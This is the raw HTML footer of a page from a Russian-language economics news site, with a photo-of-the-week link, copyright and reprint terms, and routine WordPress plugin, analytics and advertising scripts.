"><a style="color: #fff;" href="https://enovosty.com/photo-nedeli">Фото недели</a></p></div><div class="blogTitle"><p style="font-size:8pt;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=469&pid=10553" rel="bookmark">Впечатляющие ретрофотографии со дна озера</a></p><div style="text-align:center;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=469&pid=10553" rel="bookmark"> <img alt="Фото недели" src="https://enovosty.com/wp-content/gallery/retro_f/thumbs/thumbs_brucemozert17.jpg"></a></div></div> <div class="cls"></div> <a href="https://enovosty.com/photo-nedeli" class="readMore">Все фото &raquo;</a></div><div class="links_bal" style="width:240px;"></div><div class="links_bal" style="width:240px;"></div>  <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div></div><div class="cls"></div><script>
window.onload = function() {
// Delay to allow the async Google Ads to load
setTimeout(function() {
// Get the first AdSense ad unit on the page
var ad = document.querySelector("ins.adsbygoogle");
// If the ads are not loaded, track the event
if (ad && ad.innerHTML.replace(/\s/g, "").length == 0) {if (typeof ga !== 'undefined') {// Log an event in Universal Analytics
// but without affecting overall bounce rate
ga('send', 'event', 'Adblock', 'Yes', {'nonInteraction': 1});} else if (typeof _gaq !== 'undefined') {// Log a non-interactive event in old Google Analytics
_gaq.push(['_trackEvent', 'Adblock', 'Yes', undefined, undefined, true]);}}}, 2000); // Run ad block detection 2 seconds after page load
};
</script> </div> <!-- start NEW_content_v1 for enovosty.com <div id="adpartner-jsunit-3430"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=3430&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div> end NEW_content_v1 for enovosty.com --><div class="cls"></div><br> <div id="footer"> <div class="wiget text" style="padding-right:0; margin-right:0;" > <div id="bottom-menu" style="background: #F93; height:40px"> <a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/contacts">КОНТАКТЫ</a>|<a style="display: inline-block; width: 220px;vertical-align: top;" href="https://enovosty.com/politika-konfididencijnosti-ta-zaxistu-personalnix-danix">Политика конфиденциальности<br>и защиты персональных данных</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/redakcionnaya-politika">Редакционная политика</a> </div> <div id="counters" > </div> <div id="textfooter"> <p>2018 &copy; "Экономические новости"</p> <p>Все права защищены. </p><p>Использование материалов разрешается при условии ссылки на <a href="https://enovosty.com" style="color:#336699; text-decoration:underline;">"Экономические новости"</a> (www.enovosty.com). Для интернет-изданий обязательной является прямая гиперссылка, не закрытая от индексации поисковыми системами (отсутствие в ссылке rel="nofollow" или "noindex" ), в первом или втором абзаце опубликованного материала (ссылка должна быть в тексте) на цитируемую статью или новость. Материалы, обозначенные символом <img style="margin-bottom:-3px" src="https://enovosty.com/wp-content/themes/eizvestia/img/reklama.png" width="16" height="14" alt="" />, публикуются на правах рекламы. <br />Производство онлайн-департамента газеты "Экономические новости" (www.enovosty.com).</p> </div> <a href="https://prnews.io/ru/sites/85-enovostycom.html?i=11347" target="_blank" rel="nofollow" style="
float: right;
font-weight: bold;
color: #369;
padding: 10px;
">Размещение пресс-релизов</a> </div> </div> <div class="links_bal"> </div></div><script src="https://enovosty.com/wp-content/themes/eizvestia/js/eishare.js?v=4"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/afk.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/mailto.js"></script><div id="error-notification-id" class="enp-4766836"></div><div id="error-notification-settings" style="display: none;"><p>Спасибо большое за Вашу помощь. Мы исправим ошибку в ближайшее время!</p></div> <script>var isProcessing = false;function alter_ul_post_values(obj,post_id,ul_type){if (isProcessing)
return;isProcessing = true;jQuery(obj).find("span").html("..");jQuery.ajax({type: "POST",url: window.location.origin + "/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php",data: "post_id="+post_id+"&up_type="+ul_type,success: function(msg){jQuery(obj).find("span").html(msg);isProcessing = false;}});}</script> <link rel='stylesheet' id='wsl-widget-css' href='https://enovosty.com/wp-content/plugins/wordpress-social-login/assets/css/style.css' type='text/css' media='all' /><script type='text/javascript'>
var enp = {"ajaxurl":"\/wp-admin\/admin-ajax.php","barBackground":"#ff9933","barPosition":"bottom","barTextColor":"#ffffff","baseurl":"https:\/\/enovosty.com","confirmation":"1","cbTitle":"Are you sure?","cbError":"Error","cbOK":"OK","cbCancel":"Cancel"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/error-notification/error_notifi.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/ajax-comment-loading/js/google-acl2.js'></script><script type='text/javascript'>
var pollsL10n = {"ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","text_wait":"\u0412\u0430\u0448 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0437\u0430\u043f\u0440\u043e\u0441 \u0432\u0441\u0435 \u0435\u0449\u0435 \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442\u0441\u044f. \u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u043f\u043e\u0434\u043e\u0436\u0434\u0438\u0442\u0435\u2026","text_valid":"\u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u0432\u044b\u0431\u0435\u0440\u0438\u0442\u0435 \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c\u044b\u0439 \u0432\u0430\u0440\u0438\u0430\u043d\u0442 \u043e\u0442\u0432\u0435\u0442\u0430.","text_multiple":"\u041c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e\u0435 \u0440\u0430\u0437\u0440\u0435\u0448\u0451\u043d\u043d\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0432\u044b\u0431\u0438\u0440\u0430\u0435\u043c\u044b\u0445 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u043e\u0432:","show_loading":"1","show_fading":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/wp-polls/polls.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/js/url-span.js'></script><script type='text/javascript'>
var socialWarfare = {"addons":[],"post_id":"4766836","floatBeforeContent":""};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/social-warfare/assets/js/script.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/wp-embed.min.js'></script><script type='text/javascript'>
var icl_vars = {"current_language":"ru","icl_home":"https:\/\/enovosty.com\/","ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","url_type":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress_js.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/comment-reply.min.js'></script><script type="text/javascript"> var swp_nonce = "985a9ac432";var swpFloatBeforeContent = false;var swpClickTracking = false;</script><script>//new adriver("adriver_banner_A1", {sid:101080,sz:"A1", bt:52,pz:1,bn:0});
new adriver("adriver_banner_B4", {sid:101080,sz:"B4", bt:52,pz:2,bn:1});new adriver("adriver_banner_C1", {sid: 101080, sz: "C1", pz: 1, bn: 1, bt:52});//new adriver("adriver_banner_C2", {sid: 101080, sz: "C2", pz: 2, bn: 2, bt:52});
new adriver("adriver_banner_C3", {sid: 101080, sz: "C3", pz: 2, bn: 3, bt:52});new adriver("adriver_banner_branding", {sid: 101080, sz: "branding", bt:52});//new adriver("adriver_banner_1964215071", {sid:101080, bt:52, sz:'contentroll'});
</script><script>document.getElementById('logo').style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";//img.style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";
</script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/iepngfix.min.js" ></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/png_fix.js" ></script><script>//var pollsL10n = document.getElementById('pollsL10n');
</script><!--<script type="text/javascript">admixerML.fn.push(function () {admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f',ph: 'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069',i: 'inv-nets'
});admixerML.singleRequest();});</script>--><div id='admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069'></div><script>admixerML.fn.push(function () { admixerML.display('admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069'); });</script><!--<script type="text/javascript" charset="utf-8">(function(d,s){var o=d.createElement(s);o.async=true;o.type="text/javascript";o.charset="utf-8";if (location.protocol == "https:")
{ o.src="https://js-ru.redtram.com/n4p/0/30/ticker_30546.js"; }else
{ o.src="https://js.ru.redtram.com/n4p/0/30/ticker_30546.js"; }var x=d.getElementsByTagName(s)[0];x.parentNode.insertBefore(o,x);})(document,"script");</script>
--><script>jQuery(document).ready(function($){setTimeout(function() { ah2 = $("body .container").height(); $("#brandingimg").css('height', ah2 + 'px'); }, 2500);});</script><script src="https://affiliate.ria.com/js/ria_informer.js?riacode=015d2e7c4ce2cda608aa710275088255" async></script><div id="bfooter" style="width:1004px;margin:0 auto;position: relative;padding: 0 10px;display: block;text-align:left;">&nbsp;</div> </body></html>